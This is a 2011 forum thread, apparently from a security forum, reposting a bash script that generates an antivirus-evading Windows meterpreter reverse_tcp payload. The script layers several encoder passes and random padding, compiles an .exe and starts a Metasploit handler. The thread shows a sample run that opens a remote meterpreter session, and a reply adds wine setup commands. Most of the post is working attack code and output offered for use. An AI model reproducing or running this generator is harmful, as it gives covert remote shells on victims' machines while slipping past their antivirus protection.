Nytro Posted November 12, 2011 Report Posted November 12, 2011 FUD Payload Generator for BacktrackToday based on Astr0baby’s article on how can we create a fully undetectable metasploit payload, i modified his REVERSE_TCP Payload Generator in order to work with Backtrack 5 distro. Below you can find the modified version and a simple presentation on how it works:#!/bin/bashecho "************************************************************"echo " Automatic shellcode generator - FOR METASPLOIT "echo " By Astr0baby 2011 "echo " With some Randomic gravy and sauce to bypass Antivirus " echo " For Automatic Teensy programming and deployment "echo "************************************************************"rm -rf ShellCodeecho "Here is a network device list available on yor machine"cat /proc/net/dev | tr -s ' ' | cut -d ' ' -f1,2 | sed -e '1,2d'echo -e "What network interface are we gonna use ? \c"read interfaceecho -e "What Port Number are we gonna listen to? : \c"read portecho -e "Please enter a random seed number 1-10000, the larger the number the larger the resulting executable : \c"read seedecho -e "And lastly how many times do we want to encode our payloads 1-20? : \c"read enumber# Get OS nameOS=`uname`IO="" # store IPcase $OS in Linux) IP=`ifconfig $interface | grep 'inet addr:'| grep -v '127.0.0.1' | cut -d: -f2 | awk '{ print $1}'`;; *) IP="Unknown";;esac#echo "$IP"./msfpayload windows/meterpreter/reverse_tcp LHOST=$IP LPORT=$port EXITFUNC=thread R | ./msfencode -e x86/shikata_ga_nai -c $enumber -t raw | ./msfencode -e x86/jmp_call_additive -c $enumber -t raw | ./msfencode -e x86/call4_dword_xor -c $enumber -t raw | ./msfencode -e x86/shikata_ga_nai -c $enumber > test.c mkdir ShellCodemv test.c ShellCodecd ShellCode#Replacing plus signs at the end of linesed -e 's/+/ /g' test.c > clean.csed -e 's/buf = /unsigned char micro[]=/g' clean.c > ready.cecho "#include <stdio.h>" >> tempecho 'unsigned char ufs[]=' >> tempfor (( i=1; i<=10000;i++ )) do echo $RANDOM $i; done | sort -k1| cut -d " " -f2| head -$seed >> temp2sed -i 's/$/"/' temp2sed -i 's/^/"/' temp2 echo ';' >> temp2 cat temp2 >> tempcat ready.c >> tempmv temp ready2.cecho ";" >> ready2.cecho "int main(void) { ((void ())micro)();}" >> ready2.c mv ready2.c final.cecho 'unsigned char tap[]=' > temp3for (( i=1; i<=999999;i++ )) do echo $RANDOM $i; done | sort -k1| cut -d " " -f2| head -$seed >> temp4sed -i 's/$/"/' temp4sed -i 's/^/"/' temp4echo ';' >> temp4cat temp4 >> temp3cat temp3 >> final.c #Cleanuprm -f clean.crm -f test.crm -f ready.crm -f rand.crm -f temp2rm -f temp3rm -f temp4 /usr/bin/i586-mingw32msvc-gcc -Wall ./final.c -o ./final.exe > /dev/null 2>&1mv final.exe $RANDOM.exefilex=`ls -ct1 | head -1`sumx=`sha1sum $filex`echo $filex "...generated in ShellCode subfolder"echo $filex "sha1checksum is .." $sumx strip --strip-debug $filexcd ..echo " starting the meterpreter listener..."sleep 2./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=$IP LPORT=$port AutoRunScript=' migrate2 explorer.exe' EIn order to be able to compile the generated payload we must install the following packages:root@bt:~# apt-get install mingw32-runtime mingw-w64 mingw gcc-mingw32 mingw32-binutilsAfter the installation we must move our shell-script to default metasploit’s folder (/pentest/exploits/framework) and execute it:root@bt:/pentest/exploits/framework# chmod +x fud.sh root@bt:/pentest/exploits/framework# ./fud.sh ************************************************************ Automatic shellcode generator - FOR METASPLOIT By Astr0baby 2011 With some Randomic gravy and sauce to bypass Antivirus For Automatic Teensy programming and deployment ************************************************************Here is a network device list available on yor machine lo: eth0:What network interface are we gonna use ? eth0What Port Number are we gonna listen to? : 443Please enter a random seed number 1-10000, the larger the number the larger the resulting executable : 6000And lastly how many times do we want to encode our payloads 1-20? : 5[*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)[*] x86/shikata_ga_nai succeeded with size 344 (iteration=2)[*] x86/shikata_ga_nai succeeded with size 371 (iteration=3)[*] x86/shikata_ga_nai succeeded with size 398 (iteration=4)[*] x86/shikata_ga_nai succeeded with size 425 (iteration=5)[*] x86/jmp_call_additive succeeded with size 457 (iteration=1)[*] x86/jmp_call_additive succeeded with size 489 (iteration=2)[*] x86/jmp_call_additive succeeded with size 521 (iteration=3)[*] x86/jmp_call_additive succeeded with size 553 (iteration=4)[*] x86/jmp_call_additive succeeded with size 585 (iteration=5)[*] x86/call4_dword_xor succeeded with size 614 (iteration=1)[*] x86/call4_dword_xor succeeded with size 642 (iteration=2)[*] x86/call4_dword_xor succeeded with size 670 (iteration=3)[*] x86/call4_dword_xor succeeded with size 698 (iteration=4)[*] x86/call4_dword_xor succeeded with size 726 (iteration=5)[*] x86/shikata_ga_nai succeeded with size 753 (iteration=1)[*] x86/shikata_ga_nai succeeded with size 780 (iteration=2)[*] x86/shikata_ga_nai succeeded with size 807 (iteration=3)[*] x86/shikata_ga_nai succeeded with size 834 (iteration=4)[*] x86/shikata_ga_nai succeeded with size 861 (iteration=5)20210.exe ...generated in ShellCode subfolder20210.exe sha1checksum is .. c69699927e61dbef37423c852cebcd40f883df2b 20210.exe starting the meterpreter listener...Since we have created our payload we will try to check if it works:root@bt:/pentest/exploits/framework/ShellCode# wine 24382.exe fixme:system:SetProcessDPIAware stub!fixme:dwmapi:DwmIsCompositionEnabled 0x33cfdcfixme:file:MoveFileWithProgressW MOVEFILE_WRITE_THROUGH unimplementedfixme:advapi:SetNamedSecurityInfoW L"C:\\windows\\system32\\gecko\\1.0.0\\wine_gecko\\components\\xpti.dat" 1 536870916 (nil) (nil) 0x1b3d42c (nil)fixme:iphlpapi:NotifyAddrChange (Handle 0xa62e8d8, overlapped 0xa62e8e0): stubfixme:file:MoveFileWithProgressW MOVEFILE_WRITE_THROUGH unimplementedfixme:advapi:SetNamedSecurityInfoW L"C:\\windows\\system32\\gecko\\1.0.0\\wine_gecko\\components\\compreg.dat" 1 536870916 (nil) (nil) 0x1c18b0c (nil)wine: configuration in '/root/.wine' has been updated.fixme:toolhelp:CreateToolhelp32Snapshot Unimplemented: heap list snapshotfixme:toolhelp:Heap32ListFirst : stubPAYLOAD => windows/meterpreter/reverse_tcpLHOST => 192.168.200.22LPORT => 443AutoRunScript => migrate2 explorer.exe[*] Started reverse handler on 192.168.200.22:443 [*] Starting the payload handler...[*] Sending stage (752128 bytes) to 192.168.200.22[*] Meterpreter session 1 opened (192.168.200.22:443 -> 192.168.200.22:55865) at 2011-11-09 22:48:24 +0200meterpreter > psProcess list============ PID Name Arch Session User Path --- ---- ---- ------- ---- ---- 12 services.exe x86 0 NT AUTHORITY\INTERACTIVE C:\windows\system32\services.exe 17 explorer.exe x86 0 NT AUTHORITY\INTERACTIVE C:\windows\system32\explorer.exe 33 winedevice.exe x86 0 NT AUTHORITY\INTERACTIVE C:\windows\system32\winedevice.exe 8 24382.exe x86 0 NT AUTHORITY\INTERACTIVE Z:\pentest\exploits\framework\ShellCode\24382.exemeterpreter > sysinfoComputer : btOS : Windows XP (Build 2600, Service Pack 3).Architecture : x86System Language : en_USMeterpreter : x86/win32Now our payload is fully undetectable from most of antivirus engines. Of course we can try to scan it using online services such as novirusthanks:Credits go to Astr0babySursa: http://www.coresec.org/2011/11/09/fud-payload-generator-for-backtrack/ Quote
neox Posted November 13, 2011 Report Posted November 13, 2011 nu merge local payload ca sa il executi local trebuie instalat wine 1.3apt-get install synapticsudo add-apt-repository ppa:ubuntu-wine/ppaapt-get update apt-get install wine1.3root@bt:/pentest/exploits/framework/ShellCode#wine 24382.exein rest foarte bun Quote
